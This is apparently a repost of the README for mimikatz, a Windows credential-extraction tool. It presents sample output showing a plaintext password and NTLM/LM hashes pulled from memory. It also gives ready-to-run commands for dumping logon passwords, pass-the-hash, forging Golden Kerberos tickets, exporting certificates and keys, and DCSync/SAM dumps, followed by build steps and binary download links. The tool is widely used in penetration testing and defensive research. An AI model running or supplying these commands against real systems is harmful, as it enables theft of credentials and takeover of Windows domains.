@zzzc18 2017-08-03T12:12:08.000000Z Word count 3825 Reads 930

mimikatz


mimikatz is a tool I've made to learn C and make some experiments with Windows security.

It's now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

      .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
     .## ^ ##.
     ## / \ ##  /* * *
     ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
      '#####'    with 13 modules * * */

    mimikatz # privilege::debug
    Privilege '20' OK

    mimikatz # sekurlsa::logonpasswords

    Authentication Id : 0 ; 515764 (00000000:0007deb4)
    Session           : Interactive from 2
    User Name         : Gentil Kiwi
    Domain            : vm-w7-ult-x
    SID               : S-1-5-21-1982681256-1210654043-1600862990-1000

            msv :
             [00000003] Primary
             * Username : Gentil Kiwi
             * Domain   : vm-w7-ult-x
             * LM       : d0e9aee149655a6075e4540af1f22d3b
             * NTLM     : cc36cf7a8514893efccd332446158b1a
             * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
            tspkg :
             * Username : Gentil Kiwi
             * Domain   : vm-w7-ult-x
             * Password : waza1234/
    ...

But that's not all! Crypto, Terminal Server, Events, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

    log
    privilege::debug

sekurlsa

    sekurlsa::logonpasswords
    sekurlsa::tickets /export
    sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

    kerberos::list /export
    kerberos::ptt c:\chocolate.kirbi
    kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

    crypto::capi
    crypto::cng
    crypto::certificates /export
    crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
    crypto::keys /export
    crypto::keys /machine /export

vault & lsadump

    vault::cred
    vault::list
    token::elevate
    vault::cred
    vault::list
    lsadump::sam
    lsadump::secrets
    lsadump::cache
    token::revert
    lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so the prerequisites are:
* for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
* for the mimikatz driver, mimilove (and the ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz uses SVN for source control, but is now available with Git too!
You can use any tool you want to sync, even the Git integration in Visual Studio 2013 =)

Synchronize!

Build the solution

  • After opening the solution, Build / Build Solution (you can change architecture)
  • mimikatz is now built and ready to be used! (Win32 / x64)
    • you can get error MSB3073 about _build_.cmd and mimidrv; this is because the driver cannot be built without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:
* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

Author

This is a personal development, please respect its philosophy and don't use it for bad things!
